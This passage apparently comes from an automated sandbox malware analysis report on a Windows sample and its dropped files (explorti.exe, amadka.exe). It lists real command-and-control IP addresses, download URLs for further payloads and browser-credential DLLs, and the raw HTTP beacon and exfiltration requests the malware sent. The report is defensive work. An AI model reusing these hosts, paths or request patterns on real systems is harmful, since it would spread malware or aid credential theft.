Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: Joe Sandbox View IP Address: 77.91.77.81 77.91.77.81
Source: Joe Sandbox View IP Address: 77.91.77.82 77.91.77.82
Source: Joe Sandbox View ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0019BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 12_2_0019BD30
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBAHost: 85.28.47.30Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 39 31 37 45 39 36 37 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 2d 2d 0d 0a Data Ascii: ------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="hwid"66917E967D213859137049------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="build"Nice------HIIDGCGCBFBAKFHIJDBA--
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exeData
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe-Disposition:
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exeQ
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.2879968817.0000000001529000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php#
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php-
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php40971b6b
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php8.
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php9
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpG
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpZ
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpq)
Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpt.
Source: file.exe, 00000000.00000002.1822925903.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30
Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/freebl3.dll
Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dll
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dllhg
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/msvcp140.dll
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dll
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dlldf
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dll
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dll=
Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/sqlite3.dll
Source: file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll
Source: file.exe, 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/920475a59bac849d.php
Source: file.exe, 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/920475a59bac849d.phpI
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: file.exe String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: file.exe String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.3.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868672282.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecop
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecopnacl
Source: CFIEGDAE.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: CFIEGDAE.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: CFIEGDAE.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://support.mozilla.org
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1703015007.00000000229CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1703015007.00000000229CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: CFIEGDAE.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: CFIEGDAE.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/dHh0
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/VxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1771969155.0000000028F69000.00000004.00000020.00020000.00000000.sdmp, HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1771969155.0000000028F69000.00000004.00000020.00020000.00000000.sdmp, HDAFBGIJKEGIECAAFHDHDGCBFC.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name:
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: .idata
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C61ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C65B700
